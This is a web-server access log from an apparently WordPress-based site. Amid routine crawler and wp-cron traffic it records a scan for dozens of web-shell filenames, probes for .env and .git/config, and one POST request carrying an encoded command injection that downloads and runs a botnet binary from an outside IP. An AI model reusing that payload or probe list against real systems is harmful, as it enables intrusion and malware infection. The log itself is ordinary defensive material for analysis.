40.117.183.172 - - [20/Sep/2025:16:56:21 +0800] "GET /wp-content/ALFA_DATA/alfacgiapi/bypass.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:22 +0800] "GET /wp-content/about.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:22 +0800] "GET /wp-content/cache/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:22 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:22 +0800] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:23 +0800] "GET /wp-content/themes/twentytwentyfour/about.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:23 +0800] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:23 +0800] "GET /wp-content/upgrade/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:23 +0800] "GET /wp-content/uploads/admin.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:24 +0800] "GET /wp-content/uploads/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:24 +0800] "GET /wp-content/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:24 +0800] "GET /wp-includes/PHPMailer/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:24 +0800] "GET /wp-includes/Text/about.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:25 +0800] "GET /wp-includes/blocks/about.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:25 +0800] "GET /wp-setup.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:25 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:26 +0800] "GET /zwso.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:26 +0800] "GET /.alf.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:26 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:26 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:27 +0800] "GET /ez.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:27 +0800] "GET /.bod/.ll/ss.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:27 +0800] "GET /admin/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:27 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:28 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:28 +0800] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:28 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:28 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:29 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:29 +0800] "GET /gelay.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:29 +0800] "GET /installer.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:30 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:30 +0800] "GET /xleet.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:30 +0800] "GET /wp-sigunq.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:30 +0800] "GET /wso112233.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:31 +0800] "GET /alfanew.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:31 +0800] "GET /fw.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:31 +0800] "GET /install.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:32 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:32 +0800] "GET /simple.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:32 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:33 +0800] "GET /classsmtps.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:34 +0800] "GET /wp-blog-header.php HTTP/1.1" 404 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:34 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:35 +0800] "GET /wp-signup.php HTTP/1.1" 302 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:36 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:37 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:37 +0800] "GET /wp-comments-post.php HTTP/1.1" 405 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:37 +0800] "GET /wp-cron.php HTTP/1.1" 200 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:38 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:39 +0800] "GET /wp-mail.php HTTP/1.1" 403 2517 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:40 +0800] "GET /wp-activate.php HTTP/1.1" 302 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:41 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:42 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:42 +0800] "GET /plugins.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:42 +0800] "GET /post.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:42 +0800] "GET /wp-2019.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:43 +0800] "GET /geju.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:43 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:43 +0800] "GET /hoot.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:44 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:44 +0800] "GET /log.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:44 +0800] "GET /mail.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:44 +0800] "GET /bak.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:45 +0800] "GET /content.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:45 +0800] "GET /upfile.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:45 +0800] "GET /wp-conflg.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:45 +0800] "GET /bypass.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:46 +0800] "GET /404.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:46 +0800] "GET /updates.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:46 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:46 +0800] "GET /ae.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:47 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:47 +0800] "GET /blog.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:47 +0800] "GET /themes.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:47 +0800] "GET /ini.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:48 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:48 +0800] "GET /shell.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:48 +0800] "GET /ws.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:49 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:49 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:49 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:49 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:50 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:50 +0800] "GET /mm.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:50 +0800] "GET /users.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [20/Sep/2025:16:56:51 +0800] "POST /wp-cron.php?doing_wp_cron=1758358611.5092449188232421875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.117.183.172 - - [20/Sep/2025:16:56:51 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:52 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:52 +0800] "GET /wp-admin/images/moon.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:52 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:53 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:53 +0800] "GET /wp-api.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:53 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:54 +0800] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:54 +0800] "GET /wp-includes/fonts/admin.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:54 +0800] "GET /wp-includes/fonts/index.php HTTP/1.1" 404 27 "-" "-"
40.117.183.172 - - [20/Sep/2025:16:56:54 +0800] "GET /wsa.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [20/Sep/2025:16:58:57 +0800] "POST /wp-cron.php?doing_wp_cron=1758358737.4662439823150634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.133.154 - - [20/Sep/2025:16:58:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [20/Sep/2025:17:10:33 +0800] "POST /wp-cron.php?doing_wp_cron=1758359432.9672598838806152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.222.181.205 - - [20/Sep/2025:17:10:33 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [20/Sep/2025:17:13:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758359580.3893508911132812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
154.23.176.120 - - [20/Sep/2025:17:13:00 +0800] "GET /?author=1 HTTP/1.1" 200 19431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
154.23.176.120 - - [20/Sep/2025:17:13:03 +0800] "GET / HTTP/1.1" 301 5 "http://36.133.115.36" "Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53"
154.23.176.120 - - [20/Sep/2025:17:13:04 +0800] "GET / HTTP/1.1" 301 5 "http://36.133.115.36" "Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53"
154.23.176.120 - - [20/Sep/2025:17:13:05 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53"
36.133.115.36 - - [20/Sep/2025:17:16:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758359760.0300979614257812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.188.74 - - [20/Sep/2025:17:16:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.188.74 - - [20/Sep/2025:17:16:04 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [20/Sep/2025:17:18:01 +0800] "POST /wp-cron.php?doing_wp_cron=1758359881.3191199302673339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [20/Sep/2025:17:18:01 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:17:43:11 +0800] "POST /wp-cron.php?doing_wp_cron=1758361391.0965099334716796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:17:43:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:04:01 +0800] "POST /wp-cron.php?doing_wp_cron=1758362641.5021550655364990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [20/Sep/2025:18:04:15 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [20/Sep/2025:18:05:44 +0800] "POST /wp-cron.php?doing_wp_cron=1758362744.5741291046142578125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [20/Sep/2025:18:05:44 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:07:45 +0800] "POST /wp-cron.php?doing_wp_cron=1758362865.5839180946350097656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:18:07:45 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:11:35 +0800] "POST /wp-cron.php?doing_wp_cron=1758363095.4065589904785156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.236.127.48 - - [20/Sep/2025:18:11:35 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [20/Sep/2025:18:25:06 +0800] "POST /wp-cron.php?doing_wp_cron=1758363906.7250819206237792968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [20/Sep/2025:18:25:07 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:31:02 +0800] "POST /wp-cron.php?doing_wp_cron=1758364262.7289779186248779296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:18:31:03 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:39:14 +0800] "POST /wp-cron.php?doing_wp_cron=1758364754.0771241188049316406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [20/Sep/2025:18:39:14 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:53:11 +0800] "POST /wp-cron.php?doing_wp_cron=1758365591.3226079940795898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [20/Sep/2025:18:53:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:18:54:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758365640.5094289779663085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:18:54:00 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:19:01:36 +0800] "POST /wp-cron.php?doing_wp_cron=1758366096.3096549510955810546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
209.38.19.118 - - [20/Sep/2025:19:01:36 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
209.38.19.118 - - [20/Sep/2025:19:01:37 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
3.146.111.124 - - [20/Sep/2025:19:13:28 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [20/Sep/2025:19:17:37 +0800] "POST /wp-cron.php?doing_wp_cron=1758367057.8556330204010009765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:19:17:38 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
220.181.108.144 - - [20/Sep/2025:19:21:53 +0800] "GET /2159/ HTTP/1.1" 200 28935 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.79 - - [20/Sep/2025:19:21:53 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px-150x150.webp HTTP/1.1" 200 7416 "http://cqqizhou.com/2159/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [20/Sep/2025:19:30:31 +0800] "POST /wp-cron.php?doing_wp_cron=1758367831.1510579586029052734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [20/Sep/2025:19:30:31 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:19:30:56 +0800] "POST /wp-cron.php?doing_wp_cron=1758367856.8151819705963134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.149.59.26 - - [20/Sep/2025:19:30:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.149.59.26 - - [20/Sep/2025:19:31:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [20/Sep/2025:19:31:46 +0800] "POST /wp-cron.php?doing_wp_cron=1758367906.1424489021301269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [20/Sep/2025:19:31:46 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.210.194.206 - - [20/Sep/2025:19:32:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [20/Sep/2025:19:34:18 +0800] "POST /wp-cron.php?doing_wp_cron=1758368058.9277479648590087890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [20/Sep/2025:19:34:19 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:19:40:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758368453.7350161075592041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:19:40:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:19:44:42 +0800] "POST /wp-cron.php?doing_wp_cron=1758368682.4856700897216796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [20/Sep/2025:19:44:43 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [20/Sep/2025:20:03:44 +0800] "POST /wp-cron.php?doing_wp_cron=1758369824.2070651054382324218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.140.225 - - [20/Sep/2025:20:03:44 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [20/Sep/2025:20:04:30 +0800] "POST /wp-cron.php?doing_wp_cron=1758369870.4033710956573486328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:20:04:30 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:20:06:26 +0800] "POST /wp-cron.php?doing_wp_cron=1758369986.1966478824615478515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [20/Sep/2025:20:06:26 +0800] "GET /login.rsp HTTP/1.1" 301 5 "-" "Hello World"
36.133.115.36 - - [20/Sep/2025:20:14:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758370462.0964250564575195312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.216.150.174 - - [20/Sep/2025:20:14:22 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [20/Sep/2025:20:23:37 +0800] "POST /wp-cron.php?doing_wp_cron=1758371017.8636939525604248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [20/Sep/2025:20:23:38 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [20/Sep/2025:20:24:41 +0800] "POST /wp-cron.php?doing_wp_cron=1758371081.7325000762939453125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [20/Sep/2025:20:24:41 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7.urbotnetisass%3B%20wget%20http%3A%2F%2F94.154.35.154%2Farm7.urbotnetisass%3B%20chmod%20777%20%2A%3B%20.%2Farm7.urbotnetisass%20tbk HTTP/1.1" 404 8989 "-" "Mozila/5.0"
36.133.115.36 - - [20/Sep/2025:20:27:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758371220.1300530433654785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [20/Sep/2025:20:27:00 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.172 - - [20/Sep/2025:20:27:38 +0800] "GET /wp-content/uploads/2025/07/1750649189-qizhou1920x1080_4.webp HTTP/1.1" 200 174962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [20/Sep/2025:20:28:10 +0800] "POST /wp-cron.php?doing_wp_cron=1758371290.1446011066436767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [20/Sep/2025:20:28:10 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
